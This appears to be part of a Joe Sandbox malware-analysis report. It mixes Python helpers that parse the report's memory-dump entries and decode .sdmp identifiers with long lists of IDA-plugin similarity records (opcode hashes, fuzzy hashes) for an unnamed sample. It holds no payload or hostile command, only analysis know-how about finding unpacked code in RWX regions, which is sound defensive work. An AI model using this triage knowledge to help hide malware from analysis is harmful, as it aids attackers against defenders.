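    """Opcode ID -> string, for entries whose String ID field is non-empty."""
    return {e.opcode_id: e.string_id for e in entries if e.string_id}

# Constructed excerpt: two entries copied from this report and trimmed to a few dumps.
SAMPLE = """Memory Dump Source
• Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
• Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
Similarity
• API ID:
• String ID: curl
• API String ID: 0-65018701
• Opcode ID: a93cb2207dc1c670e9b0a878c11dbc1b1ea8ab460838dcf0d9ee07960deef1ba
Memory Dump Source
• Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
• Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
"""

if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for base, prot in rwx_regions(ents).items():
        print(f"{base:#010x} {prot}")
    print(strings_of_interest(ents))
```

Run against the full report text rather than the excerpt, the same parser gives the set of writable+executable regions the sandbox dumped and the functions that reference recognisable strings (here the "curl" string at Opcode ID a93cb220...), which is the short list an analyst wants before opening the dumps in a disassembler.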
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                    • Instruction ID: 3ca404f912d109ff3af58a68d933ff0c18bbcf784948645fd5155320b0cf3a4c
                                    • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                    • Instruction Fuzzy Hash: AA12B776F483154FC30CED6DC992359FAD757C8310F1A893EA959DB3A0E9B9EC014681
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                    • Instruction ID: aed6eacc40b0d3e1b76abcabcbb9f378fa09ca89ea130d45577a8787e2bf5b0e
                                    • Opcode Fuzzy Hash: 3eb5461328efb87861e9783b3581e7f2d97aa883510f9df698f5ad02820d1331
                                    • Instruction Fuzzy Hash: 25121D37B515198FEB44DEA5D8483DBB3A2FF9C318F6A9534CD48AB607C635B502CA80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b489d3e890a0bdc21eb8b0ccd9b881b9bfeab70dd3cc1d5ba7d0647587261885
                                    • Instruction ID: 966c53b979bfa411f2e1b7fbd276635546e49da1cdf7d8a35a708872a590f531
                                    • Opcode Fuzzy Hash: b489d3e890a0bdc21eb8b0ccd9b881b9bfeab70dd3cc1d5ba7d0647587261885
                                    • Instruction Fuzzy Hash: 78E113709287168FD324CF18C44036ABBE2BB85350F34852FE9998B395D778ED66DB81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f9fdce27e0c08aaa136195bf50fd50e26f8c6ab1c09a39df00ea5af6afb8290d
                                    • Instruction ID: f12bf5410c21afc43c9b8cc4fae639ea09e6a2d8be4262b39e3da6221a1eb958
                                    • Opcode Fuzzy Hash: f9fdce27e0c08aaa136195bf50fd50e26f8c6ab1c09a39df00ea5af6afb8290d
                                    • Instruction Fuzzy Hash: 0DC1AE75604B118FD724CF29D480A6AB7E2FF86314F148A2DE4EA87791DB34E846CF51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1e0a7c697294dc09dda826697cfab8ba0482d08f607acdebfdc5a344c1a18a3e
                                    • Instruction ID: a4cbab8581c45df9bded09f9bd30dd7516f337e165bd55c8f197491e89ae7be3
                                    • Opcode Fuzzy Hash: 1e0a7c697294dc09dda826697cfab8ba0482d08f607acdebfdc5a344c1a18a3e
                                    • Instruction Fuzzy Hash: 7BC16CB1605A21CBD328CF19D494265F7E2FF91310F2586ADD5AA8F781C738EA85CF80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
                                    • Instruction ID: da5ca6b597984e9eb2812b4e805e748d0d87acc8454c846228d5ffcd259930af
                                    • Opcode Fuzzy Hash: f57790fc9442d0c129ae6c3bd1a915ddae62763f18f3c9809363f70497540787
                                    • Instruction Fuzzy Hash: A5A1F372A083114FC719CF28C48062AB7E6FFCB350F5A862DE59597391E635EC468B82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 03f6f01a4011d0c7d7b8426b05ab874b7f2965931f7e54cdbff1150a3691c223
                                    • Instruction ID: d41a1024c4ef525a6b2a4270828e7492ced8d697dcaeac0e795d08d0e39ec99d
                                    • Opcode Fuzzy Hash: 03f6f01a4011d0c7d7b8426b05ab874b7f2965931f7e54cdbff1150a3691c223
                                    • Instruction Fuzzy Hash: D2A19535A101598FDF39DE25CC51FDA73A2EF89310F0A8625EC599F3D1EA30AD458781
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: same 17 memory dumps as the entry above (identical Source File and Offset)
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4065392069eed25496cbd85d81719b18aec719f2a07539597da3fa81f42f6e4
                                    • Instruction ID: eb9b870fe6eb0cee039e6e1a3c48cd34088f9e015c92dae4f1ea4ff78d814044
                                    • Opcode Fuzzy Hash: d4065392069eed25496cbd85d81719b18aec719f2a07539597da3fa81f42f6e4
                                    • Instruction Fuzzy Hash: F4C11671914B418BD722CF39C881BE7F7E1BF99300F519A1DE8EAA6241EB707584CB51
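The `.sdmp` identifiers in the Memory Dump Source entry above carry, among other fields, each dumped region's base address and its Windows memory protection. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it decodes those identifiers with the winnt.h protection and memory-type constants and lists the image-backed regions that are both writable and executable. The field layout it assumes (process index, snapshot, sequence, base address, protection, flag, memory type, flag) is inferred from the identifiers on this page and is not a documented Joe Sandbox format; the two flag fields are carried through undecoded. The four identifiers embedded in the block are copied from the entry above.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) identifiers into Windows memory attributes.

Assumed field layout (inferred from the identifiers in this report, not documented
by Joe Sandbox): <process index>.<snapshot>.<sequence>.<base address>.<protection>
.<flag>.<memory type>.<flag>.sdmp. Protection and memory type use the winnt.h
constants; the two flag fields are not decoded.
"""
import re
from dataclasses import dataclass

# winnt.h page protection constants (low byte; PAGE_GUARD etc. are modifier bits above it)
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h memory type constants as reported by VirtualQuery
MEMORY_TYPE = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # every PAGE_EXECUTE* value
_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # READWRITE, WRITECOPY and their EXECUTE forms

SDMP_RE = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<snapshot>[0-9A-Fa-f]{8})\.(?P<sequence>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag1>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<flag2>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    snapshot: int
    sequence: int
    base: int
    protect: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"UNKNOWN(0x{self.protect:x})")

    @property
    def memory_type_name(self) -> str:
        return MEMORY_TYPE.get(self.mem_type, f"UNKNOWN(0x{self.mem_type:x})")

    @property
    def executable(self) -> bool:
        return bool(self.protect & _EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & _WRITE_MASK)


def parse_sdmp(identifier: str) -> DumpRegion:
    """Parse one .sdmp identifier; raise ValueError for anything that does not match."""
    m = SDMP_RE.match(identifier.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {identifier!r}")
    return DumpRegion(
        process_index=int(m["process"], 16),
        snapshot=int(m["snapshot"], 16),
        sequence=int(m["sequence"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["memtype"], 16),
    )


def rwx_image_regions(identifiers):
    """Base addresses of image-backed regions that are both writable and executable.

    A PE mapped from disk has no such pages unless something changed the section
    rights at run time, so these are the regions to inspect for unpacked code."""
    hits = []
    for ident in identifiers:
        region = parse_sdmp(ident)
        if region.memory_type_name == "MEM_IMAGE" and region.executable and region.writable:
            hits.append(region.base)
    return sorted(hits)


# Identifiers copied from the "Memory Dump Source" entry in this report.
REPORT_DUMPS = [
    "00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for ident in REPORT_DUMPS:
        r = parse_sdmp(ident)
        print(f"{r.base:#010x} {r.protection_name:<24} {r.memory_type_name}")
    print("RWX image regions:", [f"{b:#x}" for b in rwx_image_regions(REPORT_DUMPS)])
```

Run against the four embedded identifiers, the region at 0x2D1000 (the source of the functions listed here) decodes to PAGE_EXECUTE_READWRITE inside a MEM_IMAGE mapping and the one at 0xDB7000 to PAGE_EXECUTE_WRITECOPY, while the 0x2D0000 header page and the 0xA1B000 region are plain PAGE_READWRITE. Writable-and-executable pages inside a mapped image are the first places to carve when looking for the unpacked payload.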
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 46f143a1864b5ed293f4dfb9d2a035fc0b1fd53cef69cfd7eae99b2120d7d5d2
                                    • Instruction ID: 23e85c0c484fd5b713f6cd999ead42c4cf423f9e8e50f171667ebf72099790d0
                                    • Opcode Fuzzy Hash: 46f143a1864b5ed293f4dfb9d2a035fc0b1fd53cef69cfd7eae99b2120d7d5d2
                                    • Instruction Fuzzy Hash: 6F712D222086501BDB15492D48902F967E35FC232BF5947EAECEAC73C5CE358C8F9792
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d1b4e5b868075c6d8da1047944b1335d2510916c9950274065eccd584f6e77c0
                                    • Instruction ID: fee0c11329252d8776ffa59790544c9c7eb5c6cc2b390ff0da9fb6fd111304d9
                                    • Opcode Fuzzy Hash: d1b4e5b868075c6d8da1047944b1335d2510916c9950274065eccd584f6e77c0
                                    • Instruction Fuzzy Hash: 35810761D0D78457E6219B369A017EBB3E4AFB5348F099B2EBD8C61113FB34B9D48312
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: baf01c9eba09986a6d4e6b5d8b7f44fe9f24f27c85260837f52e62ca3626a608
                                    • Instruction ID: 3a7a1a11a655ff0294930881b2e41d1d6b16d4a2ea10701cad574dbf2fbef5aa
                                    • Opcode Fuzzy Hash: baf01c9eba09986a6d4e6b5d8b7f44fe9f24f27c85260837f52e62ca3626a608
                                    • Instruction Fuzzy Hash: A0712432A08B21CBC7109F19E89076AB7E2EFD5325F19872CE8944B390D335ED518FA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 613f941418a4eded9ed621306e36b2c23caa7de82579e5383d63f4886d5fe0d8
                                    • Instruction ID: d353bd5a58dfcc1422939035990ff3c3acd6c1ab99eac6bf4b074864f19d850a
                                    • Opcode Fuzzy Hash: 613f941418a4eded9ed621306e36b2c23caa7de82579e5383d63f4886d5fe0d8
                                    • Instruction Fuzzy Hash: B9811972D18B828BD3148F28D8806B6B7A1FFDA354F14475EE8E607783E7749581C781
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 03e675d1552695c981446cfbae045c63ea03d97866b4adba96d6a67201ad68de
                                    • Instruction ID: ecb5f5188d0f1df77d947fdc61a52f6c1fa4f25c70488ba2157e196c6509d66e
                                    • Opcode Fuzzy Hash: 03e675d1552695c981446cfbae045c63ea03d97866b4adba96d6a67201ad68de
                                    • Instruction Fuzzy Hash: 6381FA72D18B829BD3148F24C8806B6B7A1FFDA314F14DB5EF8E616782E7749581C781
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4fb51d403f9ec867620ebac2869e4099a1fcb111ddfec26875932b14c0adeea3
                                    • Instruction ID: 706daa45cddbfc128bf6cb56fa88a85ecce5d395566709a06402577b7f20b0fb
                                    • Opcode Fuzzy Hash: 4fb51d403f9ec867620ebac2869e4099a1fcb111ddfec26875932b14c0adeea3
                                    • Instruction Fuzzy Hash: 3C718B72D087A08FD7118F28C8806A9BBA3AFD6314F29836EF8D55B753E7759A41C740
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cb1e67549243157275386efd92c987bb6d84e789f65498053afc2108d0249025
                                    • Instruction ID: 4908bdb39d3f61a368f1f4a4bb7b3fff45481e81af9ccb20dd9e11e20b1a0127
                                    • Opcode Fuzzy Hash: cb1e67549243157275386efd92c987bb6d84e789f65498053afc2108d0249025
                                    • Instruction Fuzzy Hash: 96410377F25A280BE35CD9299C5522A73C2A7C4310B8B463DDA96C73C1DC74DD17A2C0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                    • Instruction ID: 1db124bbf156571d4cf20ffdac73415c6920ef39fce65f414410329e744a49a4
                                    • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                    • Instruction Fuzzy Hash: BC31C03131831A4BC714ADAAC4C022AF6D3ABD8365F55873DE989C3380E9719C4D8682
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated dumps, IDA plugin and Snapshot File: identical to the first Memory Dump Source entry above
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                    • Instruction ID: bd48c0bdca9c0e67edb83d8d1d573809a27fd27909aeab93e99f394f2768c256
                                    • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                    • Instruction Fuzzy Hash: CEF0AF33B616290BA360DDB66C011E6A6C3B3C0370F1F8965EC44E7502E934DC4687C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                    • Instruction ID: b0040e31f9d5650be8ecbf375acf75f4a8d8554251a8a43d968aa70811fd5fe5
                                    • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                    • Instruction Fuzzy Hash: 0FF08C33A20A340B6360CC7A8D05097A2C7A7C86B0B0FC969ECA0E7206E930EC0656D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4c53a4638b564e12316abea6a535fc8ab2169478dee5af82e9cc0bc09d945ca
                                    • Instruction ID: 70b8d71f1d441d6662cedd084245e5d58be3786d6bc1ddc7016f012b528129a2
                                    • Opcode Fuzzy Hash: d4c53a4638b564e12316abea6a535fc8ab2169478dee5af82e9cc0bc09d945ca
                                    • Instruction Fuzzy Hash: C3B01235D002008B5707CA38DD711D132B273E2300395C4EDD00345010D639D0038A04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: [
                                    • API String ID: 0-784033777
                                    • Opcode ID: f1a1104a99e7d97227cb9761e32d0d60a4dff6aab0cee9c56999b63c2fa9cd8a
                                    • Instruction ID: c2a622b9bccb227db98985d4470700d41b4d6f013c73187d2f6531a255cd268c
                                    • Opcode Fuzzy Hash: f1a1104a99e7d97227cb9761e32d0d60a4dff6aab0cee9c56999b63c2fa9cd8a
                                    • Instruction Fuzzy Hash: 9CB148719083917FDB378A2288D377ABBD8EF55304F1AC52DF8C6C6181EB65D8848B52
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: islower
                                    • String ID: $
                                    • API String ID: 3326879001-3993045852
                                    • Opcode ID: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                    • Instruction ID: 4cd648c50a9abc5b52345594c0c89667c5f1aa7cc9e73e2ccbd454befbb4dd00
                                    • Opcode Fuzzy Hash: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                    • Instruction Fuzzy Hash: 636103306087458BC7148F68C88027FFBE3AFC5316F149A2DEC969B395E770C9498B42